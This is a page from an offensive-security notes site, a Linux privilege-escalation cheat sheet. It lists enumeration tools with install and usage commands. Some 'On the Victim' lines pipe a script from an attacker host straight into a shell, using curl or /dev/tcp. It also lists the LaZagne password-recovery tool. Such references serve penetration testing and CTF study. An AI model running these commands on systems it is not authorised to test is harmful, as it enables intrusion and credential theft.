Red Squad
Ctrlk
BuyMeACoffee
  • 🏠/home/red-squad
  • 🌐Web Hacking
    • 🚩CTFs shortcuts
    • πŸ—ΊοΈAudits plan
    • πŸ•΅οΈOSINT
    • Enumeration
    • πŸ”—HTTP Stuff
    • πŸ”Sessions / Tokens
    • πŸ’‰Injections
    • πŸͺ±Web Vulnerabilities
    • β›”WAF Bypass
    • ✍️Servers / CMS
    • πŸ–‡οΈAPI
  • 🐧Linux Hacking
    • πŸ§—Privilege Escalation
      • Find passwords
      • Ansible
      • Manual Checks
      • Automated Checks
    • πŸ‘£Cover tracks
    • πŸšͺBackdoors
    • β­•Reverse Shells
    • πŸ”’Compiled Binaries
    • 🌊Buffer Overflow
    • 🐳Docker Escape
    • 🀝File sharing
  • πŸͺŸWindows Hacking
    • πŸ‘₯Active Directory
    • πŸ’‘Useful AD Commands
    • πŸ§—Privilege Escalation
    • 🐚Shells
    • πŸ”“Bypasses
    • πŸ“ƒOffice
    • πŸ‘©β€πŸ’»SCCM | MECM
    • πŸ’ŽMicrosoft 365
  • πŸ’½Systems
    • πŸ•β€πŸ¦ΊServices Enumeration
    • πŸ–¨οΈPrinters
    • πŸ›‘οΈFortinet
    • πŸ“ΉCCTV / IP Cameras
  • πŸŽ†Networks
    • πŸŒͺ️Pivoting
    • πŸ”₯Firewalls
    • πŸ”—Proxies
  • πŸ“±Mobile Hacking
    • πŸ€–Android
    • 🍏iOS
    • πŸ“ΊIOT
  • Configuration
    • ChromeOS
    • Mobile
    • IBM
  • πŸ“‘Wireless Hacking
    • πŸŽ†Wi-Fi Attacks
    • 🫐Bluetooth
  • πŸ‘¨β€πŸ’»Code Audit
    • βœ”οΈBest Practices
    • ❌Bad Practices
    • βš’οΈTools
  • πŸ‘Thick Client Hacking
    • πŸ“Thick Client Pentesting Methodology
    • πŸ—„οΈResources
  • πŸ—„οΈMISC
    • πŸ”‘Default Credentials
    • πŸ”»CVEs
    • 🦊Browser Extensions
    • πŸ€–AI
    • πŸ”­Hacking Labs
    • πŸ”«Exploitation Frameworks
  • πŸ•΅οΈOPSEC
    • πŸ—οΈPrivacy
  • πŸ”‘CRACKING | ENCODING
    • πŸ₯ŠBruteforce tools
    • πŸ“Wordlists
    • 🧨Cracking Tools
    • πŸ”¬Encoding | Decoding Tools
    • πŸ”Steganography | Cipher
  • πŸ”΄RED TEAM
    • πŸ“₯Password Extract
    • πŸ•΅οΈSpy cam
    • πŸ”’Lock Picking
    • 🎣Phishing
  • πŸŒ€Whistle Blowing
    • πŸ“ΉCCTV
  • πŸ”΅BLUE TEAM
    • 🧩Forensics
    • 🦹Malware Analysis
    • πŸ› οΈTools
    • 🍯HoneyPots
    • πŸŽ†Networks Security
    • πŸͺ™Online IoC Scanners
  • 🐞Bug Bounty Related
    • Searching for CVEs
    • [FR] Legal
    • Dorks
  • πŸ–₯️DEVELOPERS
    • πŸ‘¨β€πŸ’»IDE
  • πŸ“šLEARNING
    • Windows
    • SQL
    • SSL/TLS
Powered by GitBook
On this page
Edit
  1. 🐧Linux Hacking
  2. πŸ§—Privilege Escalation

Automated Checks

Linux Priv Esc Bible | http://pentestmonkey.net/tools/audit/unix-privesc-check

LogoPrivilege Escalation - Linux Β· Total OSCP Guidesushant747.gitbooks.io
unix-privesc-checkpentestmonkey

If wget doesn't work :

linux-exploit-suggester

LogoGitHub - The-Z-Labs/linux-exploit-suggester: Linux privilege escalation auditing toolGitHub

linux-smart-enumeration

LogoGitHub - diego-treitos/linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levelsGitHub

linPEAS

LogoPEASS-ng/linPEAS at master Β· peass-ng/PEASS-ngGitHub

linuxprivchecker

LogoGitHub - sleventyeleven/linuxprivchecker: linuxprivchecker.py -- a Linux Privilege Escalation Check ScriptGitHub

LinEnum

LogoGitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation ChecksGitHub

LaZagne

LogoGitHub - AlessandroZ/LaZagne: Credentials recovery projectGitHub

Retrieve lots of passwords stored on a local computer.

unix-privesc-check

https://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gzpentestmonkey.net

pwncat

LogoGitHub - calebstewart/pwncat: Fancy reverse and bind shell handlerGitHub

Usage

image
PreviousManual ChecksNextCover tracks

Last updated 2 years ago

Was this helpful?

  • Linux Priv Esc Bible | http://pentestmonkey.net/tools/audit/unix-privesc-check
  • If wget doesn't work :
  • linux-exploit-suggester
  • linux-smart-enumeration
  • linPEAS
  • linuxprivchecker
  • LinEnum
  • LaZagne
  • unix-privesc-check
  • pwncat
  • Usage

Was this helpful?

cat > les.sh
This file was created using cat (^._.^)
# Hit Ctrl+D to exit!
# install
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

# usage
./les.sh
# install
wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh
curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh

# usage
# shows interesting information that should help you to privesc
./lse.sh -l1 
# dump all the information it gathers about the system
./lse.sh -l2 
# install
wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh

# COMMANDS
# Local network
# On the Host
sudo python -m SimpleHTTPServer 80 

# On the Victim
curl $ip/linpeas.sh | sh 

# Without curl
# On the Host
sudo nc -q 5 -lvnp 80 < linpeas.sh 

# On the Victim
cat < /dev/tcp/10.10.10.10/80 | sh 

# USAGE
#all checks - deeper system enumeration, but it takes longer to complete.
./linpeas.sh -a 
# superfast & stealth - This will bypass some time consuming checks. In stealth mode Nothing will be written to the disk.
./linpeas.sh -s
 #Password - Pass a password that will be used with sudo -l and bruteforcing other users
./linpeas.sh -P
# INSTALL
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py

# python 2.6/2.7
python linuxprivchecker.py -w -o linuxprivchecker.log

# python 3.x
pip install linuxprivchecker

# USAGE
linuxprivchecker -w -o linuxprivchecker.log
# or 
python3 -m linuxprivchecker -w -o linuxprivchecker.log
# install
git clone https://github.com/rebootuser/LinEnum.git

# usage
./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
# install
git clone https://github.com/AlessandroZ/LaZagne.git
cd LaZagne
pip install -r requirements.txt
cd Linux/

# usage
python laZagne.py
chmod +x unix-privesc-check
./unix-privesc-check > checks.txt
# enumeration
run enumerate # to enumerate the whole server
run enumerate.file.caps # to enumerate linux capabilities
run enumerate.file.suid # to enumerate suid files